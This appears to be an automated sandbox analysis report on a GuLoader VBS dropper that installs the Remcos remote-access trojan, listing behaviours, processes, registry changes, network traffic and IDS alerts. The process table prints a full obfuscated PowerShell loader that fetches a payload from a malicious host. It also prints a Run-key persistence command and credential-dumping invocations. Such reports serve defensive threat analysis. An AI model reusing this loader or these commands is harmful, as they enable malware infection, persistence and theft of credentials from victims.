| File name: | 1a4039a88c5a2295319a7b9433d054d23a36944cc9af350ba9dc560204a10212.vbs |
| Full analysis: | https://app.any.run/tasks/46c9f256-15a5-4eea-99f1-9fa355724b8e |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | August 20, 2024, 13:09:57 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 297A92793D04873F239DCFD13AA3F642 |
| SHA1: | 3DDD87E54F3C5604C9DB7598482F271813292849 |
| SHA256: | 1A4039A88C5A2295319A7B9433D054D23A36944CC9AF350BA9DC560204A10212 |
| SSDEEP: | 3072:xjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmESTVVe:BGO63WSdYB51Gy/quNHwaHdHqHb0bIkm |
MALICIOUS
GULOADER has been detected
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- powershell.exe (PID: 4920)
Changes the autorun value in the registry
- reg.exe (PID: 7056)
Steals credentials from Web Browsers
- wab.exe (PID: 240)
Actions looks like stealing of personal data
- wab.exe (PID: 6356)
- wab.exe (PID: 6256)
- wab.exe (PID: 240)
REMCOS has been detected
- wab.exe (PID: 6840)
Scans artifacts that could help determine the target
- wab.exe (PID: 6356)
Uses NirSoft utilities to collect credentials
- wab.exe (PID: 240)
Connects to the CnC server
- wab.exe (PID: 6840)
REMCOS has been detected (SURICATA)
- wab.exe (PID: 6840)
SUSPICIOUS
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- powershell.exe (PID: 4920)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- wab.exe (PID: 6840)
- powershell.exe (PID: 4920)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 6824)
- powershell.exe (PID: 6876)
- wscript.exe (PID: 6236)
Runs shell command (SCRIPT)
- wscript.exe (PID: 6824)
- wscript.exe (PID: 6236)
Reads security settings of Internet Explorer
- wab.exe (PID: 6840)
Reads the date of Windows installation
- wab.exe (PID: 6840)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 5244)
Checks Windows Trust Settings
- wab.exe (PID: 6840)
Converts a specified value to a byte (POWERSHELL)
- powershell.exe (PID: 6440)
The process executes VB scripts
- wab.exe (PID: 6840)
Application launched itself
- wab.exe (PID: 6840)
Writes files like Keylogger logs
- wab.exe (PID: 6840)
Contacting a server suspected of hosting an CnC
- wab.exe (PID: 6840)
Checks for external IP
- wab.exe (PID: 6840)
Connects to unusual port
- wab.exe (PID: 6840)
INFO
Disables trace logs
- powershell.exe (PID: 6876)
- powershell.exe (PID: 4920)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- powershell.exe (PID: 4920)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- powershell.exe (PID: 4920)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
- powershell.exe (PID: 4920)
Creates or changes the value of an item property via Powershell
- wscript.exe (PID: 6824)
- powershell.exe (PID: 6876)
Checks proxy server information
- powershell.exe (PID: 6876)
- wab.exe (PID: 6840)
- powershell.exe (PID: 4920)
Converts byte array into ASCII string (POWERSHELL)
- powershell.exe (PID: 6876)
- powershell.exe (PID: 6440)
Reads the computer name
- wab.exe (PID: 6840)
- wab.exe (PID: 6256)
- wab.exe (PID: 6356)
- wab.exe (PID: 240)
Checks supported languages
- wab.exe (PID: 6840)
- wab.exe (PID: 6356)
- wab.exe (PID: 240)
- wab.exe (PID: 6256)
Process checks computer location settings
- wab.exe (PID: 6840)
Reads Environment values
- wab.exe (PID: 6840)
Reads the software policy settings
- wab.exe (PID: 6840)
Reads the machine GUID from the registry
- wab.exe (PID: 6840)
- wab.exe (PID: 6256)
- wab.exe (PID: 240)
Create files in a temporary directory
- wab.exe (PID: 6256)
- wab.exe (PID: 240)
- wab.exe (PID: 6356)
- wab.exe (PID: 6840)
Reads Microsoft Office registry keys
- wab.exe (PID: 6356)
Creates files or folders in the user directory
- wab.exe (PID: 6840)
Mpress packer has been detected
- wab.exe (PID: 6840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
143
Monitored processes
21
Malicious processes
8
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 240 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\leeaqdfmlc" | C:\Program Files (x86)\Windows Mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2256 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3116 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Posho.Sgs && echo t" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3208 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4592 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\leeaqdfmlc" | C:\Program Files (x86)\Windows Mail\wab.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4708 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4920 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene';If (${host}.CurrentCulture) {$Ruefulness='SUBsTR';$Danmarksmestrenes++;}$Ruefulness+='ing';Function semisavage($Semicultivated){$Attesterer=$Semicultivated.Length-$Danmarksmestrenes;For( $Saetningsblok=2;$Saetningsblok -lt $Attesterer;$Saetningsblok+=3){$Deaktivering250+=$Semicultivated.$Ruefulness.'Invoke'( $Saetningsblok, $Danmarksmestrenes);}$Deaktivering250;}function bagstagets($Mirrorise){ . ($Fetichize) ($Mirrorise);}$Nedtrappedes=semisavage 'AfM,eoVezMiiF,lB lAra ,/ S5In.Ko0Af Fe(EuWDei DnredN,oJaw,tsFi .uNSaTR. U1 .0Ha.He0Si; K BaW riTjnMa6 f4ko;Re LaxL.6 K4Be; , urChv.a: ,1Ov2He1,a. M0Re) u SoGBeeL,cBlkKroPr/M.2,o0 ,1 .0 0 E1Ap0 B1St TrFCri,irBeePefr o NxBe/Un1Re2Wi1Mi.Im0Fo ';$Speronaros33=semisavage ' .UAdsCheSurWa- OARigD e OnClt ';$Ischiovertebral=semisavage 'W.hN.t tF.pDusB.:In/ru/,twFoe Kl Occlo Um DsSlpMalHyuHasEn.Unr BuSk/G wMipSt-KoaM,d Sm oiRanA./Chu Bs,fe Ur .s.e/p MSviGdj Ua c.BofInlW.aPr ';$Badeomraaderne=semisavage 'U > L ';$Fetichize=semisavage 'Udi ,e NxNo ';$Chromocyte='Pagterne';$Dysgenical = semisavage 'SceSkcTrhPeo , ,l%DeaRepF,p AdWiaObtSkaAn%.h\,iPDoo usTrhSooTo..rSF gsasB, Mo&Ve& D .eD,cAshhao,i Yht h ';bagstagets (semisavage ' E$K gRelS,o,fbBea ylLe: D.te r.ciSte ,t u=Me(L.c Sm TdSt Ud/SycRu Un$H,D AyGrsCrgCoeTunCaiFecVaaB lA )Gt ');bagstagets (semisavage 'St$StgRilT,oSabtoaSilAn: JB wu FsV,bGloTayR.=Ge$ lIBysr,cKrhSti doAhvMae ErTot eEdbl rRaaQdlHy. LsOopSklKoiA,tTo(,l$M,BN aNudFleKroPemTorUnaSaa Ad .eOvrFenH,e.a)G. ');bagstagets (semisavage 'Un[ ,N FeI t.n.F.S.xeU,rIsvReiAtcIde .PBlo PiWenMatSmM NaU,n aaPeg ,eBerEp]Be:Ha:DrSlaeOpcStuStrRei Ft,iyDePSur ,oLatBloVicsyo FlS, S=,a Hu[ .NBleUnt S.ErSP eAuc LuI.rekiEst iyDrPSpr Bo Dt LoStcT,osulP.TFryKwpPle o]Un:U :hoT RlXas D1.e2 R ');$Ischiovertebral=$Busboy[0];$pvc= (semisavage 'pa$Kog SlLio ,bScas lTh:a.SBiehac.urP euntN iEun.esPi=PeNFreLowUn- UOOvb.ej.telocSatE. ImSL.yS s Pt Me mdo. N reent J.HnWPreI,bsuCA,lD i LeDenVgt');$pvc+=$Deriet[1];bagstagets ($pvc);bagstagets (semisavage 'E.$InSFieFecBarOpe RtEli anExsSi.AdHmiePha rdBle,er Bs,a[Fl$DeSCopAseG rNeoSknFoaD,rReoAssRa3ph3Ur] P=Ka$NoN.oe ,dU t SrAsaplpb,p .eAadSueDesFu ');$Fnernes=semisavage 'ag$p,S Le Sc .r neLft iSun MsBe.muDStoSkwPhnPrlh,oTnaSwdHaFgui MlBee i(,n$UdI,lsEpcBih PiHaoNivM e MrE.tBres.bHvrGaaKnl .,em$ TL,kaForD.mbrs.f) . ';$Larms=$Deriet[0];bagstagets (semisavage 'Ma$S.gInlAloW.b yaE.lKo: SS.oeC lT vOpmStoledEqsSliHagUneMolAisoseL.s .=Ju(umTU eP,sOvt.k-UnP UaD,tRehPr No$siL .a ,rF,mRusH.)El ');while (!$Selvmodsigelses) {bagstagets (semisavage 'Pa$ HgLol.toOfb Pa.ylKr:SeH UuSarFrtHafChuRelti=.u$ ,tE,r gupeeVi ') ;bagstagets $Fnernes;bagstagets (semisavage ' BSRut ,aBrrButWy- aSPelUle,reFlpS. Se4s. ');bagstagets (semisavage ' R$Trg BlUdoAbbIna PlHi:UnS,pe Fl,evTrm.co dUbs eiSig De gl Ms.fe PsBe=Po( NTAleDes at.a- oPNoaBet ThO Da$ChL .aInr,am.osP )Du ') ;bagstagets (semisavage 'Op$DigL,lovoSkbPha Al s: oD,ueT s.picolBevv,e.rrNo=Ro$ShgS,lDeo .bFlaHilF.:P SMetAfeAsr FiBrlodiEuzE,aSabStiPrl ,i ,tReisneTasLe+Un+St%Fo$PeB.guB.sS,bWeo.uyR,.Rec,ooUnuRun ,tSh ') ;$Ischiovertebral=$Busboy[$Desilver];}$Fogedforbud=347549;$Keckling=28042;bagstagets (semisavage 'T,$T gLilB.o Kb Ba UlKo:.dGA r naSlpS,h oCosr c DoEjp ee.e ,o=Op SGcoeKntSa-.hC loOmn bt Ae Mn Nt . r$MoLF,aSkrMemYmsU, ');bagstagets (semisavage 'Gr$H gAflL.onibBeaCylKu:SegMekHos K Ut= . e[TaS ay.os atOveRkmSy.VaC,uoLbnByvReeC,rR,tJ,]A : E: MFspr loTamH BCia Hs reNi6 4 S otHerPoi unVrg a(S.$UdGSurC.aFapTrhMaoB sb cDioSkpT e D)S, ');bagstagets (semisavage 'Fl$Dig ulOro.obR.aMelFi:ooP naTelTolHyipraS.tChiS vSkeNal,tyD Fl=M, M,[TrS nySfsIntR,eMemV .RbT,aeAnxFrtBo.,nE DnAscMoo NdIdiP.n .gAn] i: U: .A,eS uCmaIUnI b.TiGZ e ht RSS.t Cr PiO,nFagSc( P$ArgRekResAn)Sm ');bagstagets (semisavage 'Am$.kg olL o ObVeaTelPh:t.K Lni,i HfShe SlCriPikHyeHa=af$PrPTaaTilTilLoiS aAlthaiOsv ae SlN.yPe.UnsD u bK.s.nt .rMiiNonHogS,(.o$ AFTro ,g eUrdsafE.oZurM.b Su dEx,Di$CoK teCacS.kUblAmi in PgFo) O ');bagstagets $Knifelike;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5116 | "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\wyjkrvqnhksmbh" | C:\Program Files (x86)\Windows Mail\wab.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5244 | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Silkepudlernes" /t REG_EXPAND_SZ /d "%Sydkoreanske% -w 1 $Cupidinous=(Get-ItemProperty -Path 'HKCU:\Menald\').Posits201;%Sydkoreanske% ($Cupidinous)" | C:\Windows\SysWOW64\cmd.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6236 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Trekanterne174.vbs" | C:\Windows\SysWOW64\wscript.exe | — | wab.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
Total events
32 966
Read events
32 903
Write events
63
Delete events
0
Modification events
| (PID) Process: | (6824) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6824) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6824) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6824) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6876) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
Executable files
0
Suspicious files
4
Text files
9
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 240 | wab.exe | C:\Users\admin\AppData\Local\Temp\bhvE547.tmp | — | |
MD5:— | SHA256:— | |||
| 6876 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1e11ytjf.imm.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6876 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:D7071EBCB3F738E990022C5ECC8B1FCF | SHA256:FCDBAE81D5D3C7BB037142A4400A2EFA5E52FB27FA9E6377FEDCACB6567EAC06 | |||
| 6440 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bkmtu4zn.ef5.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6440 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_okfpswyq.3fl.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6876 | powershell.exe | C:\Users\admin\AppData\Roaming\Kanels.rte | text | |
MD5:03E2C279D7DE3AF481CB60A67E468253 | SHA256:3C4433205B7A888862111ADFC6A44D3D2647C7BF197B0051CA70B8074BA799FD | |||
| 6840 | wab.exe | C:\Users\admin\AppData\Local\Temp\Trekanterne174.vbs | text | |
MD5:1603BCB30077161D37F2977DB50F5873 | SHA256:C658636D66ECBAF505B36DED0D6798240FC60B955A47B58473C9F28B4927B22A | |||
| 6876 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ishubow2.zsm.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6440 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6840 | wab.exe | C:\Users\admin\AppData\Roaming\sfvnspt.dat | binary | |
MD5:B0D41454E65A0B8F6B9F492E2F061AAB | SHA256:0833C165BBDB9872FC4BD2C7B372D4DD00A49A923BBD1E8F7D61AFD36275637D | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
24
DNS requests
8
Threats
9
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 403 | 192.250.234.170:443 | https://susplanet.com/wp-admin/users/Accruals.pfb | US | — | — | unknown |
— | — | GET | 403 | 192.250.234.170:443 | https://susplanet.com/wp-admin/users/FfJvRUfdrgAVTCua158.bin | US | — | — | unknown |
6876 | powershell.exe | GET | 200 | 193.25.216.165:80 | http://cpanel-adminhost.com/Accruals.pfb | US | text | 514 Kb | unknown |
6840 | wab.exe | GET | 200 | 193.25.216.165:80 | http://cpanel-adminhost.com/FfJvRUfdrgAVTCua158.bin | US | binary | 483 Kb | suspicious |
6840 | wab.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | NL | binary | 957 b | whitelisted |
— | — | GET | 401 | 31.31.198.183:443 | https://welcomsplus.ru/wp-admin/users/Mija.fla | RU | html | 9.90 Kb | unknown |
— | — | GET | 401 | 31.31.198.183:443 | https://welcomsplus.ru/wp-admin/users/Mija.fla | RU | html | 9.90 Kb | unknown |
— | — | GET | 401 | 31.31.198.183:443 | https://welcomsplus.ru/wp-admin/users/Mija.fla | RU | html | 9.90 Kb | unknown |
— | — | GET | 401 | 31.31.198.183:443 | https://welcomsplus.ru/wp-admin/users/Mija.fla | RU | html | 9.90 Kb | unknown |
— | — | GET | 401 | 31.31.198.183:443 | https://welcomsplus.ru/wp-admin/users/Mija.fla | RU | html | 9.90 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4192 | RUXIMICS.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 192.168.100.255:138 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4760 | svchost.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4760 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2120 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
6876 | powershell.exe | 192.250.234.170:443 | susplanet.com | CL-794 | US | unknown |
4324 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6876 | powershell.exe | 193.25.216.165:80 | cpanel-adminhost.com | — | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
susplanet.com |
| unknown |
cpanel-adminhost.com |
| unknown |
iwarsut775laudrye2.duckdns.org |
| malicious |
geoplugin.net |
| malicious |
welcomsplus.ru |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
6876 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 |
2256 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain |
2256 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
6840 | wab.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Checkin |
6840 | wab.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |
6840 | wab.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |
3 ETPRO signatures available at the full report